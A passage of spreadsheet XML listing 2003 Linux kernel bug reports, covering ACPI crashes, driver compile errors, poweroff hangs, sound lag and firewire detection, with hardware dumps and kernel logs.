    <t>Distribution: Debian unstable Hardware Environment: Clevo SIS630 based notebook Software Environment: Debian unstable, acpi 0.06 Problem Description: When trying to check the current power state with acpi 0.06 the kernel oopses. Everything went fine with test7. Oops message is attached. Steps to reproduce: Simply run acpi(1).</t>
  </si>
  <si>
    <t>kernel crash reading garbled ACPI table - Dell Precision 410, 610</t>
  </si>
  <si>
    <t>2.4.23pre6</t>
  </si>
  <si>
    <t>2003-10-27 05:10 UTC</t>
  </si>
  <si>
    <t>Tony Gale</t>
  </si>
  <si>
    <t>2004-06-17 22:27 UTC</t>
  </si>
  <si>
    <t>Zhu Yi</t>
  </si>
  <si>
    <t>Distribution: RH9 Hardware Environment: dual-PII 450MHz, Intel 440BX, PIIX4 Software Environment: Problem Description: pre6, pre7 and pre8 fail to boot past Uncompressing kernel. Reverting the ACPI changes from pre6 allows it to boot.</t>
  </si>
  <si>
    <t>Panic on ext3 running dbench or tiobench</t>
  </si>
  <si>
    <t>2003-10-27 07:59 UTC</t>
  </si>
  <si>
    <t>2003-12-18 12:05 UTC</t>
  </si>
  <si>
    <t>sound problems from incorrect IRQ routing - IOAPIC + LNK</t>
  </si>
  <si>
    <t>2.4.23-pre[678]</t>
  </si>
  <si>
    <t>2003-10-27 21:47 UTC</t>
  </si>
  <si>
    <t>SungHyun Nam</t>
  </si>
  <si>
    <t>2010-03-04 09:03 UTC</t>
  </si>
  <si>
    <t>Distribution: redhat 8.0 Hardware Environment: athlon Software Environment: ?? Problem Description: cannot play sound Steps to reproduce: boot -&gt; play sound If I revert the ChangeSet@1.1063.43.16, no sound problem.</t>
  </si>
  <si>
    <t>ACPI-1120: *** Error: Method execution failed ... AE_AML_BUFFER_LIMIT on Compaq X1005EA</t>
  </si>
  <si>
    <t>2003-10-28 09:26 UTC</t>
  </si>
  <si>
    <t>2006-09-28 13:12 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 1.4 Hardware Environment: Compaq X1005EA Software Environment: kernel boot and acpid Problem Description: when I boot with the 2.6.0-test9 kernel, I have different error messages related to acpi (AE_AML_BUFFER_LIMIT and at the end of the dmesg file sleeping function error). Steps to reproduce: Compile the 2.6.0-test9 kernel with default compilation option with pay attention to not activate debug option of acpi.</t>
  </si>
  <si>
    <t>Power-Video</t>
  </si>
  <si>
    <t>ohci1394 call trace error messages</t>
  </si>
  <si>
    <t>2003-10-29 09:00 UTC</t>
  </si>
  <si>
    <t>2004-02-06 06:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux 1.4 Hardware Environment: Compaq X1005EA (Centrino architecture) Software Environment: Problem Description: At startup, the kernel generates oops messages when the ohci1394 module is loading in memory. Steps to reproduce: Load the ochi1394 module in memory.</t>
  </si>
  <si>
    <t>Touchpad scroll wheel problems on Compaq X1005EA 2.6.0-test9 kernel</t>
  </si>
  <si>
    <t>2003-10-29 09:13 UTC</t>
  </si>
  <si>
    <t>2004-02-01 13:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4 Hardware Environment: Compaq X1005EA Software Environment: XFree86 4.3.99.13 Problem Description: when I want to move down in a webpage to see the content that I don't see actually, I have to scroll up which produce the movement of cursor and the content of the webpage on down. However, the cursor doesn't have to move, only the content of the page hide on the bottom, have to move to reveal the next lines. Steps to reproduce: Compile the kernel with PS/2 mouse + synaptics touchpad support</t>
  </si>
  <si>
    <t>r8169 driver does not compile</t>
  </si>
  <si>
    <t>2.6.0_beta9</t>
  </si>
  <si>
    <t>2003-10-29 13:53 UTC</t>
  </si>
  <si>
    <t>Nick Thompson</t>
  </si>
  <si>
    <t>2003-12-17 18:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Sager 8890 Laptop Software Environment: ? Problem Description: When enabling support for the the 1000 MBit Realtek 8169 network device driver (as a module or compiled into the kernel), the compile halts with the following error: drivers/net/r8169.c: In function `rtl8169_close': drivers/net/r8169.c:1520: error: too few arguments to function `synchronize_irq' Steps to reproduce: Enable support for the Realtek 8169 driver and compile the kernel. The halt appears every time. Steps to fix: Simply change line 1520 of the driver/net/r8169.c source. The original is: synchronize_irq (); After doing a little research, I found that the correct call is: synchronize_irq ( dev-&gt;irq ); When changed, the driver compiles correctly and runs great. Using it now as I type this.</t>
  </si>
  <si>
    <t>Poweroff fails on HP OmniBook 500 and other laptops in 2.4.22 and 2.4.23</t>
  </si>
  <si>
    <t>2.4.22, 2.4.23rc*</t>
  </si>
  <si>
    <t>2003-10-29 21:26 UTC</t>
  </si>
  <si>
    <t>Adam Kessel</t>
  </si>
  <si>
    <t>2004-03-04 12:35 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Unstable Hardware Environment: HP OmniBook 500 Software Environment: Shutting down Problem Description: I posted this recently to lkml, but got no response, so I thought I would report it here as well.[1] I also posted to acpi-devel.[2] In 2.4.22-rc2, ACPI poweroff worked fine on the HP OmniBook. Since 2.4.22, all the way up to 2.4.23-pre8, the system fails to shutdown--the process gets to "power off" and hangs there. It is necessary to do a hard shut down to turn the system off. There is no problem with rebooting. Apparently this effects a number of HP laptops, although I have only verified it on the OmniBook 500.[3] This problem is not present in any of the 2.6.0 kernels, up to -test9. I am using force=acpi as required since I have an older BIOS. Apparently the problem occurs in OmniBook laptops they have newer BIOSes as well. I expect this is related to the Sony VAIO problem discussed this month on the acpi-devel list as well.[4] [1] http://www.ussg.iu.edu/hypermail/linux/kernel/0310.1/1625.html [2] http://sourceforge.net/mailarchive/forum.php?thread_id=3368475&amp;forum_id=6102 [3] http://zurich.ai.mit.edu/pipermail/omnibook/2003-September/002805.html [4] http://article.gmane.org/gmane.linux.acpi.devel/4770 Steps to reproduce: Shut down system</t>
  </si>
  <si>
    <t>Kernel does not Uncompress</t>
  </si>
  <si>
    <t>2003-10-30 09:12 UTC</t>
  </si>
  <si>
    <t>Stefan Fleiter</t>
  </si>
  <si>
    <t>2007-04-29 03:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: ASUS P2L97 (LX-Chipset), P22 333 Problem Description: First I have to say, taht I searched throuh the oether bug reports and that I am quite sure that my .config is right. To the problem: I built a kernel from source and wanted to boot it, but nothing is printed on the screen after the boot command of grub, if I copy a 2.4-kernel image at the same location it boots fine. # sh scripts/ver_linux (of kernel 2.4.23-pre5) Linux ID-24857 2.4.23-pre5 #2 Di Sep 23 00:03:27 CEST 2003 i686 GNU/Linux ? Gnu C 3.3.2 Gnu make 3.80 util-linux 2.12 mount 2.12 module-init-tools 0.9.15-pre2 e2fsprogs 1.35-WIP PPP 2.4.2b3 nfs-utils 1.0.5 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.14 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0.91 Modules Loaded ppp_async nfsd lockd sunrpc serial binfmt_misc ipt_MASQUERADE ipt_LOG ipt_state iptable_filter iptable_nat ip_conntrack_ftp ip_conntrack ip_tables microcode ne 8390 crc32 usbkbd hid mousedev keybdev input msr usb-uhci usbcore agpgart apm reiserfs loop floppy sr_mod cdrom bsd_comp ppp_generic isdn_bsdcomp hisax isdn slhc isa-pnp msdos isofs st dummy parport_pc lp parport vfat fat smbfs nls_iso8859-2 nls_iso8859-15 nls_iso8859-1 nls_cp852 nls_cp850 nls_cp437 rtc unix # cat /proc/cpuinfo processor???????: 0 vendor_id???????: GenuineIntel cpu family??????: 6 model???????????: 5 model name??????: Pentium II (Deschutes) stepping????????: 0 cpu MHz?????????: 334.098 cache size??????: 512 KB fdiv_bug????????: no hlt_bug?????????: no f00f_bug????????: no coma_bug????????: no fpu?????????????: yes fpu_exception???: yes cpuid level?????: 2 wp??????????????: yes flags???????????: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr bogomips????????: 666.82 #cat /proc/ioports 0000-001f : dma1 0020-003f : pic1 0040-005f : timer 0060-006f : keyboard 0070-007f : rtc 0080-008f : dma page reg 00a0-00bf : pic2 00c0-00df : dma2 00f0-00ff : fpu 0213-0213 : isapnp read 02f8-02ff : serial(auto) 0300-031f : eth0 0378-037a : parport0 037b-037f : parport0 03c0-03df : vga+ 03f8-03ff : serial(auto) 0778-077a : parport0 0a79-0a79 : isapnp write 0cf8-0cff : PCI conf1 b800-b8ff : Adaptec AHA-2940U/UW/D / AIC-7881U d000-d01f : AVM Audiovisuelles MKTG &amp; Computer System GmbH A1 ISDN [Fritz] d000-d01f : avm PCI d400-d41f : Intel Corp. 82371AB/EB/MB PIIX4 USB d400-d41f : usb-uhci d800-d80f : Intel Corp. 82371AB/EB/MB PIIX4 IDE e400-e43f : Intel Corp. 82371AB/EB/MB PIIX4 ACPI e800-e81f : Intel Corp. 82371AB/EB/MB PIIX4 ACPI # cat /proc/iomem 00000000-0009f7ff : System RAM 0009f800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000c7fff : Video ROM 000c8000-000ce5ff : Extension ROM 000f0000-000fffff : System ROM 00100000-0fffffff : System RAM 00100000-002086a7 : Kernel code 002086a8-0027033f : Kernel data e0000000-e0000fff : Adaptec AHA-2940U/UW/D / AIC-7881U e0000000-e0000fff : aic7xxx e0800000-e080001f : AVM Audiovisuelles MKTG &amp; Computer System GmbH A1 ISDN [Fritz] e1000000-e2dfffff : PCI Bus #01 e1000000-e1ffffff : nVidia Corporation NV4 [RIVA TNT] e2f00000-e3ffffff : PCI Bus #01 e3000000-e3ffffff : nVidia Corporation NV4 [RIVA TNT] e4000000-e7ffffff : Intel Corp. 440LX/EX - 82443LX/EX Host bridge ffff0000-ffffffff : reserved # lspci -vvv 00:00.0 Host bridge: Intel Corp. 440LX/EX - 82443LX/EX Host bridge (rev 03) ????????Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- ????????Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR+ &lt;PERR- ????????Latency: 64 ????????Region 0: Memory at e4000000 (32-bit, prefetchable) [size=64M] ????????Capabilities: [a0] AGP version 1.0 ????????????????Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2 ????????????????Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00:01.0 PCI bridge: Intel Corp. 440LX/EX - 82443LX/EX AGP bridge (rev 03) (prog-if 00 [Normal decode]) ????????Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- ????????Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- ????????Latency: 64 ????????Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 ????????I/O behind bridge: 0000e000-0000dfff ????????Memory behind bridge: e1000000-e2dfffff ????????Prefetchable memory behind bridge: e2f00000-e3ffffff ????????BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- 00:04.0 ISA bridge: Intel Corp. 82371AB/EB/MB PIIX4 ISA (rev 01) ????????Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- ????????Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- ????????Latency: 0 00:04.1 IDE interface: Intel Corp. 82371AB/EB/MB PIIX4 IDE (rev 01) (prog-if 80 [Master]) ????????Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- ????????Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- ????????Latency: 32 ????????Region 4: I/O ports at d800 [size=16] 00:04.2 USB Controller: Intel Corp. 82371AB/EB/MB PIIX4 USB (rev 01) (prog-if 00 [UHCI]) ????????Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- ????????Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- ????????Latency: 32 ????????Interrupt: pin D routed to IRQ 9 ????????Region 4: I/O ports at d400 [size=32] 00:04.3 Bridge: Intel Corp. 82371AB/EB/MB PIIX4 ACPI (rev 01) ????????Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- ????????Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- ????????Interrupt: pin ? routed to IRQ 9 00:0a.0 Network controller: AVM Audiovisuelles MKTG &amp; Computer System GmbH A1 ISDN [Fritz] (rev 02) ????????Subsystem: AVM Audiovisuelles MKTG &amp; Computer System GmbH FRITZ!Card ISDN Controller ????????Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- ????????Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- ????????Interrupt: pin A routed to IRQ 9 ????????Region 0: Memory at e0800000 (32-bit, non-prefetchable) [size=32] ????????Region 1: I/O ports at d000 [size=32] 00:0b.0 SCSI storage controller: Adaptec AHA-2940U/UW/D / AIC-7881U ????????Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- ????????Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- ????????Latency: 32 (2000ns min, 2000ns max), Cache Line Size: 0x08 (32 bytes) ????????Interrupt: pin A routed to IRQ 9 ????????Region 0: I/O ports at b800 [disabled] [size=256] ????????Region 1: Memory at e0000000 (32-bit, non-prefetchable) [size=4K] ????????Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] 01:00.0 VGA compatible controller: nVidia Corporation NV4 [RIVA TNT] (rev 03) (prog-if 00 [VGA]) ????????Subsystem: Elsa AG Erazor II SGRAM ????????Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- ????????Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- ????????Latency: 64 (1250ns min, 250ns max) ????????Interrupt: pin A routed to IRQ 15 ????????Region 0: Memory at e1000000 (32-bit, non-prefetchable) [size=16M] ????????Region 1: Memory at e3000000 (32-bit, prefetchable) [size=16M] ????????Expansion ROM at e2ff0000 [disabled] [size=64K] ????????Capabilities: [60] Power Management version 1 ????????????????Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) ????????????????Status: D0 PME-Enable- DSel=0 DScale=0 PME- ????????Capabilities: [44] AGP version 1.0 ????????????????Status: RQ=16 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2 ????????????????Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; # cat /proc/scsi/scsi Attached devices:? Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: IBM-PCCO Model: DDRS-39130Y !# Rev: S97B Type: Direct-Access ANSI SCSI revision: 02 Host: scsi0 Channel: 00 Id: 01 Lun: 00 Vendor: SEAGATE Model: ST34572W Rev: 0784 Type: Direct-Access ANSI SCSI revision: 02 Host: scsi0 Channel: 00 Id: 03 Lun: 00 Vendor: PLEXTOR Model: CD-ROM PX-12TS Rev: 1.02 Type: CD-ROM ANSI SCSI revision: 02 Host: scsi0 Channel: 00 Id: 05 Lun: 00 Vendor: TEAC Model: CD-R58S Rev: 1.0H Type: CD-ROM ANSI SCSI revision: 02 # dmesg Linux version 2.4.23-pre5 (sf@ID-24857) (gcc-Version 3.3.2 20030908 (Debian prerelease)) #2 Di Sep 23 00:03:27 CEST 2003 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009f800 (usable) BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000010000000 (usable) BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) 256MB LOWMEM available. On node 0 totalpages: 65536 zone(0): 4096 pages. zone(1): 61440 pages. zone(2): 0 pages. Kernel command line: root=/dev/sdb6 ro vga=extended Local APIC disabled by BIOS -- reenabling. Found and enabled local APIC! Initializing CPU#0 Detected 334.096 MHz processor. Console: colour VGA+ 80x50 Calibrating delay loop... 666.82 BogoMIPS Memory: 257140k/262144k available (1057k kernel code, 4616k reserved, 415k data, 92k init, 0k highmem) Dentry cache hash table entries: 32768 (order: 6, 262144 bytes) Inode cache hash table entries: 16384 (order: 5, 131072 bytes) Mount cache hash table entries: 512 (order: 0, 4096 bytes) Buffer cache hash table entries: 16384 (order: 4, 65536 bytes) Page-cache hash table entries: 65536 (order: 6, 262144 bytes) CPU: L1 I cache: 16K, L1 D cache: 16K CPU: L2 cache: 512K Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU: After generic, caps: 0183fbff 00000000 00000000 00000000 CPU: Common caps: 0183fbff 00000000 00000000 00000000 CPU: Intel Pentium II (Deschutes) stepping 00 Enabling fast FPU save and restore... done. Checking 'hlt' instruction... OK. POSIX enabled ExtINT on CPU#0 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 334.1022 MHz. ..... host bus clock speed is 66.8203 MHz. cpu: 0, clocks: 668203, slice: 334101 CPU0&lt;T0:668192,T1:334080,D:11,S:334101,C:668203&gt; mtrr: v1.40 (20010327) Richard Gooch (rgooch@atnf.csiro.au) mtrr: detected mtrr type: Intel PCI: PCI BIOS revision 2.10 entry at 0xf06d0, last bus=1 PCI: Using configuration type 1 PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Using IRQ router PIIX/ICH [8086/7110] at 00:04.0 Limiting direct PCI/PCI transfers. Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket Starting kswapd pty: 256 Unix98 ptys configured SCSI subsystem driver Revision: 1.00 PCI: Found IRQ 9 for device 00:0b.0 scsi0 : Adaptec AIC7XXX EISA/VLB/PCI SCSI HBA DRIVER, Rev 6.2.36 &lt;Adaptec 2940 Ultra SCSI adapter&gt; aic7880: Ultra Wide Channel A, SCSI Id=7, 16/253 SCBs (scsi0:A:0): 20.000MB/s transfers (10.000MHz, offset 8, 16bit) Vendor: IBM-PCCO Model: DDRS-39130Y !# Rev: S97B Type: Direct-Access ANSI SCSI revision: 02 (scsi0:A:1): 20.000MB/s transfers (10.000MHz, offset 8, 16bit) Vendor: SEAGATE Model: ST34572W Rev: 0784 Type: Direct-Access ANSI SCSI revision: 02 (scsi0:A:3): 10.000MB/s transfers (10.000MHz, offset 15) Vendor: PLEXTOR Model: CD-ROM PX-12TS Rev: 1.02 Type: CD-ROM ANSI SCSI revision: 02 (scsi0:A:5): 10.000MB/s transfers (10.000MHz, offset 15) Vendor: TEAC Model: CD-R58S Rev: 1.0H Type: CD-ROM ANSI SCSI revision: 02 scsi0:A:0:0: Tagged Queuing enabled. Depth 4 scsi0:A:1:0: Tagged Queuing enabled. Depth 4 Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 Attached scsi disk sdb at scsi0, channel 0, id 1, lun 0 SCSI device sda: 17774160 512-byte hdwr sectors (9100 MB) Partition check: sda: sda1 sda2 sda3 SCSI device sdb: 8888924 512-byte hdwr sectors (4551 MB) sdb: sdb1 &lt; sdb5 sdb6 sdb7 &gt; sdb2 NET4: Linux TCP/IP 1.0 for NET4.0 IP Protocols: ICMP, UDP, TCP IP: routing cache hash table of 2048 buckets, 16Kbytes TCP: Hash tables configured (established 16384 bind 32768) VFS: Mounted root (ext2 filesystem) readonly. Freeing unused kernel memory: 92k freed NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. Adding Swap: 128512k swap-space (priority -1) Real Time Clock Driver v1.10e parport0: PC-style at 0x378 (0x778), irq 7, using FIFO [PCSPP,TRISTATE,COMPAT,EPP,ECP] lp0: using parport0 (interrupt-driven). isapnp: Scanning for PnP cards... isapnp: SB audio device quirk - increasing port range isapnp: AWE32 quirk - adding two ports isapnp: Card 'Creative SB32 PnP' isapnp: 1 Plug &amp; Play card detected total CSLIP: code copyright 1989 Regents of the University of California ISDN subsystem Rev: 1.1.4.1/1.1.4.1/1.1.4.1/1.1.4.1/none/1.1.4.1 loaded HiSax: Linux Driver for passive ISDN cards HiSax: Version 3.5 (module) HiSax: Layer1 Revision 1.1.4.1 HiSax: Layer2 Revision 1.1.4.1 HiSax: TeiMgr Revision 1.1.4.1 HiSax: Layer3 Revision 1.1.4.1 HiSax: LinkLayer Revision 1.1.4.1 HiSax: Total 1 card defined HiSax: Card 1 Protocol EDSS1 Id=teles (0) HiSax: AVM PCI driver Rev. 1.1.4.1 PCI: Found IRQ 9 for device 00:0a.0 AVM PCI: stat 0x2020a AVM PCI: Class A Rev 2 HiSax: AVM Fritz!PCI config irq:9 base:0xD000 AVM PCI: ISAC version (0): 2086/2186 V1.1 AVM Fritz PnP/PCI: IRQ 9 count 1007 AVM Fritz PnP/PCI: IRQ 9 count 1010 HiSax: DSS1 Rev. 1.1.4.1 HiSax: 2 channels added HiSax: MAX_WAITING_CALLS added PPP BSD Compression module registered PPP generic driver version 2.4.2 PPP BSD Compression module registered Attached scsi CD-ROM sr0 at scsi0, channel 0, id 3, lun 0 Attached scsi CD-ROM sr1 at scsi0, channel 0, id 5, lun 0 sr0: scsi-1 drive Uniform CD-ROM driver Revision: 3.12 sr1: scsi3-mmc drive: 24x/24x writer cd/rw xa/form2 cdda tray inserting floppy driver for 2.4.23-pre5 Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 loop: loaded (max 8 devices) apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16) Linux agpgart interface v0.99 (c) Jeff Hartmann agpgart: Maximum main memory to use for agp memory: 204M agpgart: Detected Intel 440LX chipset agpgart: AGP aperture is 64M @ 0xe4000000 usb.c: registered new driver usbdevfs usb.c: registered new driver hub usb-uhci.c: $Revision: 1.275 $ time 00:27:10 Sep 23 2003 usb-uhci.c: High bandwidth mode enabled PCI: Found IRQ 9 for device 00:04.2 usb-uhci.c: USB UHCI at I/O 0xd400, IRQ 9 usb-uhci.c: Detected 2 ports usb.c: new USB bus registered, assigned bus number 1 hub.c: USB hub found hub.c: 2 ports detected usb-uhci.c: v1.275:USB Universal Host Controller Interface driver mice: PS/2 mouse device common for all mice usb.c: registered new driver hid hid-core.c: v1.8.1 Andreas Gal, Vojtech Pavlik &lt;vojtech@suse.cz&gt; hid-core.c: USB HID support drivers reiserfs: found format "3.6" with standard journal reiserfs: checking transaction log (device sd(8,23)) ... for (sd(8,23)) sd(8,23):Using r5 hash to sort names reiserfs: found format "3.6" with standard journal reiserfs: checking transaction log (device sd(8,3)) ... for (sd(8,3)) sd(8,3):Using r5 hash to sort names usb.c: registered new driver usbkbd usbkbd.c: :USB HID Boot Protocol keyboard driver ne.c:v1.10 9/23/94 Donald Becker (becker@scyld.com) Last modified Nov 1, 2000 by Paul Gortmaker NE*000 ethercard probe at 0x300: 00 c0 26 b0 30 a2 eth0: NE2000 found at 0x300, using IRQ 10. IA-32 Microcode Update Driver: v1.11 &lt;tigran@veritas.com&gt; microcode: CPU0 already at revision 64 (current=64) microcode: freed 2048 bytes ip_tables: (C) 2000-2002 Netfilter core team ip_conntrack version 2.1 (2048 buckets, 16384 max) - 292 bytes per conntrack Serial driver version 5.05c (2001-07-08) with MANY_PORTS SHARE_IRQ SERIAL_PCI ISAPNP enabled ttyS00 at 0x03f8 (irq = 4) is a 16550A ttyS01 at 0x02f8 (irq = 3) is a 16550A isdn: Verbose-Level is 2 isdn: Verbose-Level is 2 isdn: Verbose-Level is 2 isdn: Verbose-Level is 2 HiSax: debugging flags card 1 set to 4 Installing knfsd (copyright (C) 1996 okir@monad.swb.de).</t>
  </si>
  <si>
    <t>via82xx.c: invalid via82xx_cur_ptr, using last valid pointer, and lags a few seconds before playing any sound</t>
  </si>
  <si>
    <t>2.6.0-test9 (not happened on &lt;=test4)</t>
  </si>
  <si>
    <t>2003-10-31 10:50 UTC</t>
  </si>
  <si>
    <t>Danny Milosavljevic</t>
  </si>
  <si>
    <t>2004-03-28 10:22 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo 1.4 Hardware Environment: VIA KT333 with via sound, MSI board, ask for details Software Environment: linux 2.6.0-test9, glibc 2.3.2 Problem Description: When trying to play any sound, the open hangs for several seconds, but then it works normally. Steps to reproduce: Have a VIA KT333. Play any sound on the onboard sound chip via alsa snd_via82xx, have no other modules loaded. There is one message appearing on dmesg, I modified it to do: snd_printd(KERN_ERR "invalid via82xx_cur_ptr, using last valid pointer (want %d, is %d, last %d)\n", count, size, viadev-&gt;lastpos); in line 696 in function calc_linar_pos in sound/pci/via82xx.c in 2.6.0-test9. and it says: ALSA sound/pci/via82xx.c:696: invalid via82xx_cur_ptr, using last valid pointer (want 0, is 24, last 49200) Any more I can do to help track this down ?</t>
  </si>
  <si>
    <t>firewire device not found</t>
  </si>
  <si>
    <t>2003-10-31 14:14 UTC</t>
  </si>
  <si>
    <t>James J Myers</t>
  </si>
  <si>
    <t>2004-03-11 04:50 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 9 2.6.0-0.test9.1.67 Hardware Environment: Pentium 4 1.8GH, 640MB RAM Software Environment: " Problem Description: I have 3 Firewire devices on 2 cables. System only sees and configures 1 of them. gscanbus however sees all 3 devices. Steps to reproduce: lspci 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 650 Host (rev 01) 00:01.0 PCI bridge: Silicon Integrated Systems [SiS] SiS 530 Virtual PCI-to-PCI bridge (AGP) 00:02.0 ISA bridge: Silicon Integrated Systems [SiS] 85C503/5513 (rev 10) 00:02.1 SMBus: Silicon Integrated Systems [SiS]: Unknown device 0016 00:02.2 USB Controller: Silicon Integrated Systems [SiS] SiS7001 USB Controller (rev 07) 00:02.3 USB Controller: Silicon Integrated Systems [SiS] SiS7001 USB Controller (rev 07) 00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) 00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] SiS7012 PCI Audio Accelerator (rev a0) 00:07.0 FireWire (IEEE 1394): NEC Corporation IEEE 1394 [OrangeLink] Host Controller (rev 01) 00:08.0 Ethernet controller: Lite-On Communications Inc LNE100TX (rev 20) 01:00.0 VGA compatible controller: nVidia Corporation NV11DDR [GeForce2 MX 100 DDR/200 DDR] (rev b2) cat /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: Maxtor Model: 5000XT Rev: 0100 Type: Direct-Access ANSI SCSI revision: 06 lsmod Module Size Used by raw1394 25572 1 ide_cd 35972 0 cdrom 31392 1 ide_cd i810_audio 29204 0 ac97_codec 17164 1 i810_audio soundcore 7744 1 i810_audio vfat 13184 0 fat 40640 1 vfat lp 10564 0 md5 3840 1 ipv6 209472 18 autofs 13952 0 iptable_filter 2688 0 ip_tables 15872 1 iptable_filter tulip 40864 0 crc32 4352 1 tulip floppy 54100 0 parport_pc 24616 1 parport 38632 2 lp,parport_pc ext3 100904 4 jbd 49304 1 ext3 sbp2 22024 1 ohci1394 30088 0 ieee1394 211372 3 raw1394,sbp2,ohci1394 sd_mod 14880 2 scsi_mod 107576 2 sbp2,sd_mod dmesg output: Debug: sleeping function called from invalid context at include/asm/semaphore.h:119 in_atomic():0, irqs_disabled():1 Call Trace: [&lt;c0117821&gt;] __might_sleep+0x80/0x8b [&lt;e88ac7a4&gt;] hpsb_get_tlabel+0x6b/0x180 [ieee1394] [&lt;c013179c&gt;] cache_init_objs+0xc1/0x10a [&lt;e88acacd&gt;] hpsb_make_writepacket+0x73/0xd8 [ieee1394] [&lt;e886907a&gt;] sbp2util_allocate_write_packet+0x1f/0x46 [sbp2] [&lt;e886a9db&gt;] sbp2_link_orb_command+0x5c/0x14a [sbp2] [&lt;e886ab5d&gt;] sbp2_send_command+0x94/0x9c [sbp2] [&lt;e886affb&gt;] sbp2scsi_queuecommand+0xfc/0x12c [sbp2] [&lt;e884d604&gt;] scsi_done+0x0/0x53 [scsi_mod] [&lt;e884d45d&gt;] scsi_dispatch_cmd+0x192/0x1f0 [scsi_mod] [&lt;e8851801&gt;] scsi_request_fn+0x1ef/0x247 [scsi_mod] [&lt;c01d4643&gt;] __make_request+0x47a/0x49a [&lt;c01d47e2&gt;] generic_make_request+0x17f/0x18f [&lt;c0146293&gt;] submit_bh+0xc2/0x165 [&lt;c01d483e&gt;] submit_bio+0x4c/0x53 [&lt;c0144cf8&gt;] __block_write_full_page+0x1d4/0x2ca [&lt;c01481cd&gt;] blkdev_get_block+0x0/0x44 [&lt;c014616a&gt;] block_write_full_page+0x9c/0xa5 [&lt;c01481cd&gt;] blkdev_get_block+0x0/0x44 [&lt;c015b4be&gt;] 